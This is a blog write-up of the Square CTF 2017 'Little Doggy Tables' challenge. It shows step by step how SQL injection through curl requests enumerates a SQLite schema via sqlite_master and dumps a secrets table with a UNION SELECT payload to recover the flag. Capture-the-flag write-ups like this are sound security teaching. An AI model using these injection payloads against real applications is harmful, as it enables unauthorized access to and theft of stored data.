Archive for October, 2017

Write-up: Little Doggy Tables, Square CTF 2017

This is a write-up for the challenge Little Doggy Tables from Square CTF 2017.

The challenge can be found here: https://squarectf.com/challenges/little-doggy-tables

The challenge requires us to use SQL injection to extract the flag from a table in the database.

On running this command:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"

I got the following output:

dog

Which means I can run SQL queries through this command.

Furthermore, the challenge details also include the source code , which looks like this:

From checking out the source code it is obvious that SQL injection is possible and that SQLite3 was used in the database.

To check if it was working, I ran:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename='"

Which gave this Output:

Internal Server Error

unrecognized token: “‘\”;”

WEBrick/1.3.1 (Ruby/2.3.4/2017-03-30) at little-doggy-tables.capturethesquare.com:443
 

Now that I knew SQL injection was working, I had to access the meta data. Unfortunately, the information_schema table does not exist here since it is SQLite and not MySQL. I searched for an equivalent table in SQLite and came across this question on Stack Overflow:

https://stackoverflow.com/questions/6460671/sqlite-schema-information-metadata#6617764

Which gave me enough to realize that sqlite_master is the information_schema alternative in sqlite. I changed commands mentioned in the answer to the to suit my search.

All meta data in sqlite can be accessed simple by using the command:

select sql form sqlite_master

So I modified my payload to:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select sql from sqlite_master-- -"

Which gave the output:

CREATE TABLE operatives (
codename TEXT,
species TEXT,
secret TEXT
)

Now we know both the name of the table and the name of the required column which is  obviously secret. The SQL query now required to be executed is:

select group_concat(secret) from operatives

The corresponding payload would be:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select group_concat(secret) from operatives-- -"

The resulting output:

e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e,7448d8798a4380162d4b56f9b452e2f6f9e24e7a,9c6b057a2b9d96a4067a749ee3b3b0158d390cf1,5d9474c0309b7ca09a182d888f73b37a8fe1362c,flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436,ccf271b7830882da1791852baeca1737fcbe4b90,d3964f9dad9f60363c81b688324d95b4ec7c8038,136571b4

On refining the above output we get that the flag is :

flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436